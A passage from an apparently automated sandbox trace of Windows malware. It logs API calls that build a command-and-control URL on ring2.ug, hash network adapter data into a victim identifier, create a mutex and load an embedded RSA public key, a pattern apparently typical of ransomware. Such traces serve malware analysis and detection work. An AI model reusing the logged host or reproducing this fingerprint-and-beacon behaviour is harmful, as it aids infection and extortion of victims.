dwFlags=0x0, lpMem=0x3179050 | out: hHeap=0x680000) returned 1 [0072.625] TaskScheduler:IUnknown:Release (This=0x2820920) returned 0x0 [0072.625] TaskScheduler:IUnknown:Release (This=0x2820950) returned 0x0 [0072.625] IUnknown:Release (This=0x2820d18) returned 0x0 [0072.625] CoUninitialize () [0072.626] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3149ab8 | out: hHeap=0x680000) returned 1 [0072.626] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31467a0 | out: hHeap=0x680000) returned 1 [0072.626] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0072.626] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x6d41b0 [0072.627] OpenServiceW (hSCManager=0x6d41b0, lpServiceName="MYSQL", dwDesiredAccess=0x20) returned 0x0 [0072.627] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175750 [0072.627] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x3188a30 [0072.627] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x3188ed0 [0072.627] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x3189138 [0072.627] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31893a0 [0072.627] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x3189608 [0072.627] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x3189870 [0072.627] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x318d890 [0072.627] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x318daf8 [0072.627] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x318dd60 [0072.627] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x318dfc8 [0072.628] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x318e230 [0072.628] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x318e498 [0072.628] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x318e700 [0072.628] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x318e968 [0072.628] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x318ebd0 [0072.628] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x318ee38 [0072.628] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x31254e0 [0072.628] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x110) returned 0x3150248 [0072.628] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31254e0 | out: hHeap=0x680000) returned 1 [0072.628] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x110) returned 0x31467a0 [0072.628] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x61a8000, lpStartAddress=0x41dbd0, lpParameter=0x31793f0, dwCreationFlags=0x0, lpThreadId=0x513258 | out: lpThreadId=0x513258*=0x8a0) returned 0x5b4 [0072.912] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0072.912] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x28) returned 0x319d120 [0072.912] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x318f0a0 [0072.912] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x318f308 [0072.912] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x318f570 [0072.913] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x318f7d8 [0072.913] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x318fa40 [0072.913] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x318fca8 [0072.913] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x318ff10 [0072.913] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x3190178 [0072.913] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31903e0 [0072.913] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x3190648 [0072.913] lstrlenA (lpString="http://ring2.ug/Asjdi435784ihjk65pen2/get.php") returned 45 [0072.913] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x5c) returned 0x759520 [0072.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x318f0a0, cbMultiByte=-1, lpWideCharStr=0x759520, cchWideChar=46 | out: lpWideCharStr="http://ring2.ug/Asjdi435784ihjk65pen2/get.php") returned 46 [0072.913] lstrcatW (in: lpString1="", lpString2="http://ring2.ug/Asjdi435784ihjk65pen2/get.php" | out: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php") returned="http://ring2.ug/Asjdi435784ihjk65pen2/get.php" [0072.913] lstrlenA (lpString="") returned 0 [0072.913] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2) returned 0x3111848 [0072.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x318f308, cbMultiByte=-1, lpWideCharStr=0x3111848, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0072.913] lstrcatW (in: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php", lpString2="" | out: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php") returned="http://ring2.ug/Asjdi435784ihjk65pen2/get.php" [0072.913] lstrlenA (lpString="") returned 0 [0072.913] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2) returned 0x3111818 [0072.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x318f570, cbMultiByte=-1, lpWideCharStr=0x3111818, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0072.913] lstrcatW (in: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php", lpString2="" | out: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php") returned="http://ring2.ug/Asjdi435784ihjk65pen2/get.php" [0072.913] lstrlenA (lpString="") returned 0 [0072.914] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2) returned 0x31118b8 [0072.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x318f7d8, cbMultiByte=-1, lpWideCharStr=0x31118b8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0072.914] lstrcatW (in: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php", lpString2="" | out: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php") returned="http://ring2.ug/Asjdi435784ihjk65pen2/get.php" [0072.914] lstrlenA (lpString="") returned 0 [0072.914] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2) returned 0x3111868 [0072.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x318fa40, cbMultiByte=-1, lpWideCharStr=0x3111868, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0072.914] lstrcatW (in: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php", lpString2="" | out: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php") returned="http://ring2.ug/Asjdi435784ihjk65pen2/get.php" [0072.914] lstrlenA (lpString="") returned 0 [0072.914] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2) returned 0x3111878 [0072.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x318fca8, cbMultiByte=-1, lpWideCharStr=0x3111878, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0072.914] lstrcatW (in: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php", lpString2="" | out: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php") returned="http://ring2.ug/Asjdi435784ihjk65pen2/get.php" [0072.914] lstrlenA (lpString="") returned 0 [0072.914] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2) returned 0x31118d8 [0072.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x318ff10, cbMultiByte=-1, lpWideCharStr=0x31118d8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0072.914] lstrcatW (in: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php", lpString2="" | out: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php") returned="http://ring2.ug/Asjdi435784ihjk65pen2/get.php" [0072.914] lstrlenA (lpString="") returned 0 [0072.914] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2) returned 0x3111888 [0072.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3190178, cbMultiByte=-1, lpWideCharStr=0x3111888, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0072.914] lstrcatW (in: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php", lpString2="" | out: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php") returned="http://ring2.ug/Asjdi435784ihjk65pen2/get.php" [0072.915] lstrlenA (lpString="") returned 0 [0072.915] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2) returned 0x3111898 [0072.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31903e0, cbMultiByte=-1, lpWideCharStr=0x3111898, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0072.915] lstrcatW (in: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php", lpString2="" | out: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php") returned="http://ring2.ug/Asjdi435784ihjk65pen2/get.php" [0072.915] lstrlenA (lpString="") returned 0 [0072.915] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2) returned 0x31118a8 [0072.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3190648, cbMultiByte=-1, lpWideCharStr=0x31118a8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0072.915] lstrcatW (in: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php", lpString2="" | out: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php") returned="http://ring2.ug/Asjdi435784ihjk65pen2/get.php" [0072.915] lstrlenW (lpString="") returned 0 [0072.915] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x12) returned 0x6a58c8 [0072.915] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x288) returned 0x3189ad8 [0072.915] GetAdaptersInfo (in: AdapterInfo=0x3189ad8, SizePointer=0x18df34 | out: AdapterInfo=0x3189ad8, SizePointer=0x18df34) returned 0x0 [0073.023] GetAdaptersInfo (in: AdapterInfo=0x3189ad8, SizePointer=0x18df34 | out: AdapterInfo=0x3189ad8, SizePointer=0x18df34) returned 0x0 [0073.039] GetLastError () returned 0x0 [0073.046] GetLastError () returned 0x0 [0073.046] CryptAcquireContextW (in: phProv=0x18df04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18df04*=0x6de238) returned 1 [0073.096] CryptCreateHash (in: hProv=0x6de238, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18df0c | out: phHash=0x18df0c) returned 1 [0073.096] CryptHashData (hHash=0x3198e00, pbData=0x319e780, dwDataLen=0x11, dwFlags=0x0) returned 1 [0073.096] CryptGetHashParam (in: hHash=0x3198e00, dwParam=0x2, pbData=0x0, pdwDataLen=0x18df08, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18df08) returned 1 [0073.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314c6c8 [0073.096] CryptGetHashParam (in: hHash=0x3198e00, dwParam=0x2, pbData=0x314c6c8, pdwDataLen=0x18df08, dwFlags=0x0 | out: pbData=0x314c6c8, pdwDataLen=0x18df08) returned 1 [0073.096] GetLastError () returned 0x0 [0073.096] CryptDestroyHash (hHash=0x3198e00) returned 1 [0073.096] CryptReleaseContext (hProv=0x6de238, dwFlags=0x0) returned 1 [0073.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x319e780 | out: hHeap=0x680000) returned 1 [0073.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f598 [0073.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f3d8 | out: hHeap=0x680000) returned 1 [0073.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x319e258 | out: hHeap=0x680000) returned 1 [0073.097] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x61a8000, lpStartAddress=0x41e690, lpParameter=0x513270, dwCreationFlags=0x0, lpThreadId=0x51325c | out: lpThreadId=0x51325c*=0x8b0) returned 0x5d4 [0073.348] WaitForSingleObject (hHandle=0x5d4, dwMilliseconds=0xffffffff) returned 0x0 [0074.843] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}") returned 0x688 [0074.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x28) returned 0x31d4100 [0074.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x3190d80 [0074.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x3191250 [0074.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31914b8 [0074.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31e3540 [0074.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31e37a8 [0074.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31e3a10 [0074.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31e3c78 [0074.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31e3ee0 [0074.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31e4148 [0074.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31e43b0 [0074.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x3e0) returned 0x3171760 [0074.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x5ec) returned 0x31e7528 [0074.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", cchWideChar=-1, lpMultiByteStr=0x31e7528, cbMultiByte=1516, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", lpUsedDefaultChar=0x0) returned 493 [0074.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x5f0) returned 0x31e7b20 [0074.845] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31e7528 | out: hHeap=0x680000) returned 1 [0074.845] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3171760 | out: hHeap=0x680000) returned 1 [0074.851] CryptAcquireContextW (in: phProv=0x18df74, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18df74*=0x6df1a0) returned 1 [0074.882] CryptCreateHash (in: hProv=0x6df1a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18df78 | out: phHash=0x18df78) returned 1 [0074.882] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0074.882] CryptHashData (hHash=0x3198e00, pbData=0x31e7b20, dwDataLen=0x1ec, dwFlags=0x0) returned 1 [0074.882] CryptGetHashParam (in: hHash=0x3198e00, dwParam=0x2, pbData=0x0, pdwDataLen=0x18df7c, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18df7c) returned 1 [0074.882] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314df08 [0074.883] CryptGetHashParam (in: hHash=0x3198e00, dwParam=0x2, pbData=0x314df08, pdwDataLen=0x18df7c, dwFlags=0x0 | out: pbData=0x314df08, pdwDataLen=0x18df7c) returned 1 [0074.883] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x34) returned 0x3198e80 [0074.883] GetLastError () returned 0x0 [0074.883] lstrcatA (in: lpString1="", lpString2="6F" | out: lpString1="6F") returned="6F" [0074.883] GetLastError () returned 0x0 [0074.883] lstrcatA (in: lpString1="6F", lpString2="3C" | out: lpString1="6F3C") returned="6F3C" [0074.883] GetLastError () returned 0x0 [0074.883] lstrcatA (in: lpString1="6F3C", lpString2="75" | out: lpString1="6F3C75") returned="6F3C75" [0074.883] GetLastError () returned 0x0 [0074.883] lstrcatA (in: lpString1="6F3C75", lpString2="51" | out: lpString1="6F3C7551") returned="6F3C7551" [0074.883] GetLastError () returned 0x0 [0074.883] lstrcatA (in: lpString1="6F3C7551", lpString2="E2" | out: lpString1="6F3C7551E2") returned="6F3C7551E2" [0074.883] GetLastError () returned 0x0 [0074.883] lstrcatA (in: lpString1="6F3C7551E2", lpString2="67" | out: lpString1="6F3C7551E267") returned="6F3C7551E267" [0074.883] GetLastError () returned 0x0 [0074.883] lstrcatA (in: lpString1="6F3C7551E267", lpString2="D6" | out: lpString1="6F3C7551E267D6") returned="6F3C7551E267D6" [0074.883] GetLastError () returned 0x0 [0074.883] lstrcatA (in: lpString1="6F3C7551E267D6", lpString2="BC" | out: lpString1="6F3C7551E267D6BC") returned="6F3C7551E267D6BC" [0074.883] GetLastError () returned 0x0 [0074.883] lstrcatA (in: lpString1="6F3C7551E267D6BC", lpString2="75" | out: lpString1="6F3C7551E267D6BC75") returned="6F3C7551E267D6BC75" [0074.883] GetLastError () returned 0x0 [0074.884] lstrcatA (in: lpString1="6F3C7551E267D6BC75", lpString2="62" | out: lpString1="6F3C7551E267D6BC7562") returned="6F3C7551E267D6BC7562" [0074.884] GetLastError () returned 0x0 [0074.884] lstrcatA (in: lpString1="6F3C7551E267D6BC7562", lpString2="F4" | out: lpString1="6F3C7551E267D6BC7562F4") returned="6F3C7551E267D6BC7562F4" [0074.884] GetLastError () returned 0x0 [0074.884] lstrcatA (in: lpString1="6F3C7551E267D6BC7562F4", lpString2="98" | out: lpString1="6F3C7551E267D6BC7562F498") returned="6F3C7551E267D6BC7562F498" [0074.884] GetLastError () returned 0x0 [0074.884] lstrcatA (in: lpString1="6F3C7551E267D6BC7562F498", lpString2="26" | out: lpString1="6F3C7551E267D6BC7562F49826") returned="6F3C7551E267D6BC7562F49826" [0074.884] GetLastError () returned 0x0 [0074.884] lstrcatA (in: lpString1="6F3C7551E267D6BC7562F49826", lpString2="A4" | out: lpString1="6F3C7551E267D6BC7562F49826A4") returned="6F3C7551E267D6BC7562F49826A4" [0074.884] GetLastError () returned 0x0 [0074.884] lstrcatA (in: lpString1="6F3C7551E267D6BC7562F49826A4", lpString2="CE" | out: lpString1="6F3C7551E267D6BC7562F49826A4CE") returned="6F3C7551E267D6BC7562F49826A4CE" [0074.884] GetLastError () returned 0x0 [0074.884] lstrcatA (in: lpString1="6F3C7551E267D6BC7562F49826A4CE", lpString2="82" | out: lpString1="6F3C7551E267D6BC7562F49826A4CE82") returned="6F3C7551E267D6BC7562F49826A4CE82" [0074.884] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0074.884] CryptDestroyHash (hHash=0x3198e00) returned 1 [0074.884] CryptReleaseContext (hProv=0x6df1a0, dwFlags=0x0) returned 1 [0074.884] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31e7b20 | out: hHeap=0x680000) returned 1 [0074.884] lstrlenA (lpString="6F3C7551E267D6BC7562F49826A4CE82") returned 32 [0074.884] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x3e0) returned 0x3171760 [0074.884] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x5ec) returned 0x31e7528 [0074.884] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", cchWideChar=-1, lpMultiByteStr=0x31e7528, cbMultiByte=1516, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", lpUsedDefaultChar=0x0) returned 493 [0074.884] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x5f0) returned 0x31e7b20 [0074.884] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31e7528 | out: hHeap=0x680000) returned 1 [0074.884] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3171760 | out: hHeap=0x680000) returned 1 [0074.885] lstrcpyA (in: lpString1=0x3179410, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n" [0074.885] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31e7b20 | out: hHeap=0x680000) returned 1 [0074.885] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d910 [0074.885] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x28) returned 0x31d4130 [0074.885] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31e4618 [0074.885] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31e4880 [0074.885] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31e4ae8 [0074.885] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25c) returned 0x31e4d50 [0074.885] RtlAllocateHeap 